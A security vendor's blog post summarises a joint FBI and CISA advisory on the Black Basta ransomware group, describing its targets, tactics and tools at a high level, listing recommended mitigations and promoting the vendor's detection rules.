Black Basta Activity Detection: FBI, CISA & Partners Warn of Increasing Ransomware Attacks Targeting Critical Infrastructure Sectors, Including Healthcare
Table of contents:
As of May 2024, the nefarious Black Basta ransomware operators have breached over 500 global organizations. In response to the escalating threats, the U.S.’s leading and global cybersecurity agencies have issued a joint cybersecurity advisory warning defenders of the group’s increasing activity, which has already affected dozens of critical infrastructure organizations, including the healthcare sector.
Detecting Black Basta Ransomware Infections
With over 300 million ransomware attack attempts detected solely in 2023, the ransomware threat remains one of the top challenges for cyber defenders. Although Black Basta RaaS is a relatively new player in the cyber arena, the malicious collective has impacted hundreds of high-profile organizations worldwide, seeking financial gains.
To stay proactive and detect possible attacks at the earliest stages of development, security professionals might explore the latest CSA alert detailing the Black Basta TTPs and tooling. Additionally, cybersecurity practitioners might rely on SOC Prime Platform for collective cyber defense that offers a set of curated Sigma rules addressing attack methods described in the AA24-131A advisory. Just hit the Explore Detections button and immediately drill down to a relevant detection stack.
All the rules are compatible with 30+ SIEM, EDR, and Data Lake technologies and mapped to MITRE ATT&CK® framework v14.1. Additionally, detections are enriched with extensive metadata, including CTI links, ATT&CK references, attack timelines, and more.
Security professionals seeking additional context on Black Basta TTPs and eager to analyze attacks retrospectively can search for more related Sigma rules in the Threat Detection Marketplace using the “Black Basta” tag.
Black Basta Ransomware Attack Analysis
Black Basta threat actors have been in the spotlight since at least spring 2022 operating as a RaaS and primarily targeting numerous enterprises and critical infrastructure organizations in North America, Europe, and Australia. According to the joint Cybersecurity Advisory AA24-131A, for a 2-year period of active adversary activity, the group has affected more than 500 organizations from across the world, which underscores the need for increased cybersecurity awareness and proactive defensive measures.
FBI, CISA, and partners have shared insights on the ongoing ransomware attacks, with at least a dozen of critical infrastructure entities exposed to data encryption and exfiltration by adversaries, including the healthcare sector.
For initial access, Black Basta commonly leverages phishing and weaponizes known security flaws. Further, adversaries employ a double-extortion approach, which involves both encrypting systems and extracting data. Rather than sending initial ransom demand or payment guidelines, Black Basta provides victims with a unique code and prompts them to reach out to the ransomware group via a custom URL accessible through the Tor browser.
For network scanning purposes, Black Basta employs tools like SoftPerfect (netscan.exe) and for reconnaissance procedures, adversaries commonly leverage utilities with seemingly harmless filenames, such as Intel or Dell.
To move laterally across exposed networks, Black Basta affiliates rely on utilities like BITSAdmin, PsExec, and RDP. They can also leverage Splashtop, ScreenConnect, and Cobalt Strike beacons for remote access. For privilege escalation, Black Basta uses credential scraping utilities like Mimikatz and can also take advantage of vulnerability exploitation, for instance, abusing ZeroLogon, CVE-2021-42287, or PrintNightmare known security flaws.
The Black Basta ransomware group leverages RClone to steal data from compromised systems. Prior to data exfiltration, they tend to evade detection via PowerShell and the Backstab utility. They then encrypt files using the ChaCha20 algorithm with an RSA-4096 public key, append a random file extension, and leave a ransom note titled readme.txt while hindering system recovery.
Due to the large size, high reliance on technology, and access to sensitive data, healthcare organizations remain appealing targets for the Black Basta ransomware gang. To reduce the risks of breaches, defenders recommend critical organizations install all required software and firmware updates, apply multifactor authentication, secure remote access toolkits, and maintain backups of critical systems and device configurations to facilitate recovery procedures. CISA and partners also recommend applying general mitigations provided in the #StopRansomware Guide to eliminate the impact and probability of ransomware attacks and data extortion threats.
With the increasing attacks attributed to Black Basta and other ransomware affiliates targeting critical infrastructure organizations, it’s vital to continuously bolster cyber vigilance and fortify defenses. With SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting & Detection Stack Validation, defenders can minimize the risks of intrusions and maximize the value of security investments.